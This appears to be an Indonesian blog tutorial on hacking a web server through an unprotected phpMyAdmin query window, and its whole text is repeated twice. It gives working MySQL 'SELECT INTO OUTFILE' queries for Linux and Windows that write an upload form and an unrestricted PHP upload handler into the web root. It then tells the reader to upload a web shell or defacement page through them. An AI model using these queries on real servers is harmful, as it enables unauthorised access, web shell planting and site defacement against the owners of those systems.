Pertama cari targetnya, di sini saya localhost dengan link mrlover21.net
oke pertama
kita buka
http://mrlover21.net/phpmyadmin/querywindow.php
dan akan muncul seperti gambar di bawah ini :
Note : jika phpmyadmin di proteksi oleh password makan kita tidak bisa membobolnya
ok, next ke langkah selanjutnya
di sini saya punya 2 bentuk query 1 untuk linux dan 2 untuk windows
karena saya pakai windows maka
kita pakai query ke-2
Query 1 untuk linux :
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<form enctype="multipart/form-data" action="upload.php" method="post"><pre lang="html">Upload file :<form enctype="multipart/form-data" action="upload.php" method="post"><input name="userfile" type="file" /><input type="submit" value="Upload" /></form>');
SELECT * INTO OUTFILE '/opt/lampp/htdocs/form.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;
Query 2 untuk windows :
use mysql;
DROP TABLE IF EXISTS `temptab1`;
CREATE TABLE temptab1 (codetab text);
INSERT INTO temptab1 (codetab) values ('<form enctype="multipart/form-data" action="upload99.php" method="post"><pre lang="html">Upload file :<form enctype="multipart/form-data" action="upload.php" method="post"><input name="userfile" type="file" /><input type="submit" value="Upload" /></form>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/form99.php' from temptab1;
DROP TABLE temptab1;
FLUSH LOGS;
lebih lengkap liat screenshot di bawah ini :
dan tekan go, jika berhasil maka akan muncul seperti gambar dibawah ini :
Note : code query yang kita masukan di atas itu berfungsi menjadi form uploadernya
sekarang coba kita panggil formnya
karena nama filenya form99.php
maka kita panggil http://mrlover21.net/form99.php
liat ssnya di bawah :
sekarang kita lanjut ke langkah selanjutnya, yaitu membuat confirm dai form uploader
sama seperti query untuk form uploadernya, di sini terdapat 2 query
kita pakai query untuk windows
Query 1 untuk linux :
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php $uploaddir = "/opt/lampp/htdocs/";$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);echo "<pre>";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print "</pre>";?>');
SELECT * INTO OUTFILE '/opt/lampp/htdocs/upload.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;
Query 2 untuk windows :
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php $uploaddir = "C:/xampp/htdocs/";$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);echo "<pre>";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print "</pre>";?>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/upload99.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS
lebih jelas liat screenshot dibawah ini
jika sudah
sekarang tinggal upload shellnya dengan cara pangill file form99.php
contoh : mrlover21.net/form99.php lalu browse file shellmu atau file defacemu ^_^
lalu tekan upload tara shell/file defacemu sudah ke upload
tinggal buka deh contoh
http://mrlover21.net/www.mrlover21.org.php
sekian! terima kasih ^_^
oke pertama
kita buka
http://mrlover21.net/phpmyadmin/querywindow.php
dan akan muncul seperti gambar di bawah ini :
Note : jika phpmyadmin di proteksi oleh password makan kita tidak bisa membobolnya
ok, next ke langkah selanjutnya
di sini saya punya 2 bentuk query 1 untuk linux dan 2 untuk windows
karena saya pakai windows maka
kita pakai query ke-2
Query 1 untuk linux :
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<form enctype="multipart/form-data" action="upload.php" method="post"><pre lang="html">Upload file :<form enctype="multipart/form-data" action="upload.php" method="post"><input name="userfile" type="file" /><input type="submit" value="Upload" /></form>');
SELECT * INTO OUTFILE '/opt/lampp/htdocs/form.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;
Query 2 untuk windows :
use mysql;
DROP TABLE IF EXISTS `temptab1`;
CREATE TABLE temptab1 (codetab text);
INSERT INTO temptab1 (codetab) values ('<form enctype="multipart/form-data" action="upload99.php" method="post"><pre lang="html">Upload file :<form enctype="multipart/form-data" action="upload.php" method="post"><input name="userfile" type="file" /><input type="submit" value="Upload" /></form>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/form99.php' from temptab1;
DROP TABLE temptab1;
FLUSH LOGS;
lebih lengkap liat screenshot di bawah ini :
dan tekan go, jika berhasil maka akan muncul seperti gambar dibawah ini :
Note : code query yang kita masukan di atas itu berfungsi menjadi form uploadernya
sekarang coba kita panggil formnya
karena nama filenya form99.php
maka kita panggil http://mrlover21.net/form99.php
liat ssnya di bawah :
sekarang kita lanjut ke langkah selanjutnya, yaitu membuat confirm dai form uploader
sama seperti query untuk form uploadernya, di sini terdapat 2 query
kita pakai query untuk windows
Query 1 untuk linux :
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php $uploaddir = "/opt/lampp/htdocs/";$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);echo "<pre>";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print "</pre>";?>');
SELECT * INTO OUTFILE '/opt/lampp/htdocs/upload.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;
Query 2 untuk windows :
use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php $uploaddir = "C:/xampp/htdocs/";$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);echo "<pre>";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print "</pre>";?>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/upload99.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS
lebih jelas liat screenshot dibawah ini
jika sudah
sekarang tinggal upload shellnya dengan cara pangill file form99.php
contoh : mrlover21.net/form99.php lalu browse file shellmu atau file defacemu ^_^
lalu tekan upload tara shell/file defacemu sudah ke upload
tinggal buka deh contoh
http://mrlover21.net/www.mrlover21.org.php
sekian! terima kasih ^_^
No comments:
Post a Comment